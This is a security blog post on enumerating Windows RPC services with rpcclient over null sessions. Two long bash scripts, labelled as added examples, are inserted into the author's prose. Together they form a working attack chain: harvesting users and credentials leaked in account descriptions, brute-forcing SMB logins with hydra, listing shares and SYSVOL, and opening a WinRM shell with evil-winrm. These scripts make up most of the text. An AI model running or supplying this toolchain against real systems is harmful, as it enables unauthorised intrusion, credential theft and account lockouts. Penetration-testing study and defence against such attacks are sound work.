“Human Stupidity, that’s why Hackers always win.”
― Med Amine Khelifi

Hacking in 5 minutes with Remote Procedure Call and Active Directory enumeration

Before we go deeper, let me introduce what RPC (Remote Procedure Call) is, based on the Microsoft documentation:


The moment I encounter a Windows server that exposes an RPC service, I try to squeeze everything I can out of that service by enumerating it with rpcclient.

What is rpcclient? It is a tool (part of the Samba suite) for executing client-side MS-RPC functions.

rpcclient [-A authfile] [-c <command string>] [-d debuglevel] [-l logdir] [-N] [-s <smb config file>] [-U username[%password]] [-W workgroup] [-I destinationIP] {server}

rpcclient supports many commands that call MS-RPC functions; they fall into several categories: LSARPC, LSARPC-DS, REG, SRVSVC, SAMR, SPOOLSS, NETLOGON and FSRVP.

LSARPC is really a set of calls, transmitted over RPC, to a subsystem called the Local Security Authority. In the Microsoft/Windows world it is used to manage domain security policy from a remote machine. The protocol is described in Microsoft's protocol specification; the transport is MS-RPC carried over a named pipe on the Server Message Block (SMB) protocol.

List of LSARPC commands.

For example, if you are allowed to log in with a null session, you can query domain information with the querydominfo command.

enumprivs lists the privileges the LSA knows about.

LSARPC-DS is used to get the primary domain information (dsroledominfo).

REG is used for shutdown and abortshutdown; you can shut the machine down if you are a privileged user.

SRVSVC is the Server Service, which remotely manages file and printer sharing and named pipe access to the server over the Server Message Block protocol. If you wonder where the famous Windows XP / Windows Server 2003 exploit of that era (MS08-067) came from, it was this service.

With null-session access I don't have permission to list the shares. Sometimes, though, you find misconfigurations that expose juicy information.

SAMR is the Security Account Manager (SAM) Remote Protocol (client-to-server); it provides management functionality for an account store or directory containing users and groups.

Logged in with null-session permissions, the useful SAMR commands are:
querydispinfo shows every account on the target machine with its RID, full name and description. Sometimes you obtain sensitive information from the description field.
enumdomusers returns the list of users on the target machine.
getdompwinfo returns the domain password policy (minimum length and complexity), which tells you whether brute-forcing is feasible.
enumdomains gives an idea of the domains on the target machine.
enumdomgroups lists the domain groups, which shows what permissions a user may have.
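The null-session sweep described above, written out as a script. This is an added example, not code from the original post: the rpc_null wrapper runs the rpcclient commands listed in this section, and the two parsers post-process enumdomusers and querydispinfo output (the sample output they are tested on is constructed to match rpcclient's format, not captured from a real host). The hostnames, account names and descriptions in it are assumptions.

```shell
#!/usr/bin/env bash
# Added example: null-session LSARPC/SAMR enumeration with Samba's rpcclient.
# Network calls happen only inside enumerate_target; the parsers run offline
# on constructed sample output.

# Run one rpcclient command as an anonymous (null-session) user against a host.
rpc_null() {                          # usage: rpc_null <host> "<command>"
    rpcclient -U '' -N "$1" -c "$2"
}

# enumdomusers prints one line per account:   user:[Administrator] rid:[0x1f4]
# Emit "<name> <rid-in-decimal>" so the RID can be compared numerically.
parse_enumdomusers() {
    sed -n 's/^user:\[\([^]]*\)\] rid:\[\(0x[0-9a-fA-F]*\)\].*/\1 \2/p' |
    while read -r name rid; do
        printf '%s %s\n' "$name" "$((rid))"
    done
}

# The built-in administrator keeps RID 500 even when it has been renamed,
# so pick the real admin account by RID rather than by name.
admin_by_rid() {
    parse_enumdomusers | awk '$2 == 500 { print $1 }'
}

# querydispinfo lines are tab-separated after the acb field:
#   index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: sysop<TAB>Name: (null)<TAB>Desc: ...
# Print "<account><TAB><desc>" for descriptions that look like they carry a credential.
find_creds_in_desc() {
    awk -F'\t' '
    {
        acct = ""; desc = ""
        for (i = 1; i <= NF; i++) {
            f = $i
            if (sub(/^.*Account: /, "", f)) acct = f
            else if (sub(/^Desc: /, "", f)) desc = f
        }
        if (acct != "" && tolower(desc) ~ /pass|pwd|cred|secret/) print acct "\t" desc
    }'
}

# Constructed sample output in rpcclient's format (assumed names; not from a real host).
sample_enumdomusers() {
    printf 'user:[sysop] rid:[0x1f4]\n'          # renamed built-in administrator
    printf 'user:[Guest] rid:[0x1f5]\n'
    printf 'user:[krbtgt] rid:[0x1f6]\n'
    printf 'user:[svc_backup] rid:[0x44f]\n'
}
sample_querydispinfo() {
    printf 'index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: sysop\tName: (null)\tDesc: Built-in account for administering the computer/domain\n'
    printf 'index: 0x4 RID: 0x44f acb: 0x00000210 Account: svc_backup\tName: Backup Service\tDesc: temp password Summer2019! set by helpdesk\n'
}

# Full null-session sweep of a host; run as:  RPC_TARGET=10.10.10.5 ./enum.sh
enumerate_target() {
    host=$1
    for cmd in querydominfo enumprivs enumdomains enumdomgroups; do
        printf '=== %s ===\n' "$cmd"
        rpc_null "$host" "$cmd"
    done
    printf '=== users (name rid) ===\n'
    rpc_null "$host" enumdomusers | parse_enumdomusers
    printf '=== built-in administrator (RID 500) ===\n'
    rpc_null "$host" enumdomusers | admin_by_rid
    printf '=== descriptions that may leak credentials ===\n'
    rpc_null "$host" querydispinfo | find_creds_in_desc
}

# Only touch the network when a target is supplied.
if [ -n "${RPC_TARGET:-}" ]; then
    enumerate_target "$RPC_TARGET"
fi
```

Keying on RID 500 instead of the name "Administrator" matters because renaming the built-in administrator is a common hardening step; the RID cannot be changed, so enumdomusers still gives it away.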

SPOOLSS is the Microsoft Print System Remote Protocol. I won't explain much about this one, but you can explore the SPOOLSS pipe further to get a bigger picture.

Netlogon is a Windows Server process that authenticates users and other services within a domain. Since it is a service and not an application, Netlogon runs continuously in the background unless it is stopped manually or by a runtime error.

FSRVP is the File Server Remote VSS Protocol, an RPC-based protocol for creating shadow copies of file shares on a remote computer; it lets backup applications perform application-consistent backup and restore of data on SMB2 shares.

Once you have enough information, it's attacking time!

Brute-forcing the user list I gathered, with hydra.
Enumerating the share names.
Checking the files exposed through the SYSVOL share.
Getting remote access through Windows Remote Management, since the user had that permission.
Checking the user's security ID (SID) and privileges.
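The attack steps above as a script that first reads the password policy with getdompwinfo and drops candidates that can never be valid, so hydra spends fewer attempts (and less lockout budget) per account. This is an added example, not the post's own code; the tool choices for the follow-on steps (hydra for SMB brute force, smbclient for the share and SYSVOL checks, evil-winrm for the WinRM shell), the file names and the sample policy and hydra lines are assumptions. The parsers are exercised on constructed output, so the script runs offline.

```shell
#!/usr/bin/env bash
# Added example: password-policy-aware brute force followed by share and WinRM checks.
# Network calls happen only inside attack_target; the parsers run offline.

# getdompwinfo output looks like:
#   min_password_length: 7
#   password_properties: 0x00000001
#           DOMAIN_PASSWORD_COMPLEX
policy_min_len() { sed -n 's/^min_password_length:[[:space:]]*\([0-9]*\).*/\1/p'; }
policy_is_complex() {                 # prints 1 when DOMAIN_PASSWORD_COMPLEX is set, else 0
    if grep -q DOMAIN_PASSWORD_COMPLEX; then echo 1; else echo 0; fi
}

# Keep only candidates that satisfy the policy. Windows complexity requires three of
# the four classes (upper, lower, digit, other); the "must not contain the username"
# rule is ignored here because the filter runs before a username is chosen.
filter_wordlist() {                   # usage: filter_wordlist <min_len> <complex 0|1>
    awk -v min="$1" -v complex="$2" '
    length($0) < min { next }
    complex == 1 {
        n = 0
        if ($0 ~ /[A-Z]/) n++
        if ($0 ~ /[a-z]/) n++
        if ($0 ~ /[0-9]/) n++
        if ($0 ~ /[^A-Za-z0-9]/) n++
        if (n < 3) next
    }
    { print }'
}

# hydra reports a hit as:  [445][smb] host: 10.10.10.5   login: svc_backup   password: Summer2019!
parse_hydra_hit() {                   # prints "<login> <password>"
    sed -n 's/.*login: \([^ ]*\)[[:space:]]*password: \(.*\)$/\1 \2/p'
}

# Constructed sample output (assumed values; not captured from a real host).
sample_policy() {
    printf 'min_password_length: 7\npassword_properties: 0x00000001\n\tDOMAIN_PASSWORD_COMPLEX\n'
}
sample_hydra_line() {
    printf '[445][smb] host: 10.10.10.5   login: svc_backup   password: Summer2019!\n'
}

# usage: attack_target <host> <users.txt> <wordlist.txt>
attack_target() {
    host=$1; users=$2; wordlist=$3
    policy=$(rpcclient -U '' -N "$host" -c getdompwinfo)
    min=$(printf '%s\n' "$policy" | policy_min_len)
    complex=$(printf '%s\n' "$policy" | policy_is_complex)
    filter_wordlist "${min:-1}" "${complex:-0}" < "$wordlist" > filtered.txt
    printf 'policy: min_len=%s complex=%s, %s of %s candidates kept\n' \
        "$min" "$complex" "$(wc -l < filtered.txt)" "$(wc -l < "$wordlist")"
    # getdompwinfo does not show the lockout threshold; confirm it before trying more
    # than a few candidates per account. -t 1 keeps SMB attempts serial, -f stops at
    # the first valid pair.
    hydra -L "$users" -P filtered.txt -t 1 -f -o hydra.out "$host" smb
    set -- $(parse_hydra_hit < hydra.out | head -n 1)
    [ -n "${1:-}" ] || { echo 'no valid credentials'; return 1; }
    user=$1; pass=$2
    smbclient -L "//$host" -U "$user%$pass"                        # share names
    smbclient "//$host/SYSVOL" -U "$user%$pass" -c 'recurse; ls'   # files under SYSVOL
    evil-winrm -i "$host" -u "$user" -p "$pass"                    # WinRM shell, if permitted
}

# Only touch the network when a target is supplied:
#   RPC_TARGET=10.10.10.5 USERS=users.txt WORDLIST=rockyou.txt ./attack.sh
if [ -n "${RPC_TARGET:-}" ]; then
    attack_target "$RPC_TARGET" "${USERS:-users.txt}" "${WORDLIST:-wordlist.txt}"
fi
```

The filter is the practitioner's safeguard here: every attempt against an account counts toward its lockout threshold, so candidates the policy would have rejected at password-set time are pure waste, and on a domain with a low threshold they can lock out the very accounts you just enumerated.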

That's all from me. I hope it was worth your time to learn about the RPC protocol and how to abuse its security. Don't forget to follow me and become one of the earliest members of huntr to get a free hoodie. Kindly explore my previous articles too. Bye!

Security consultant and researcher
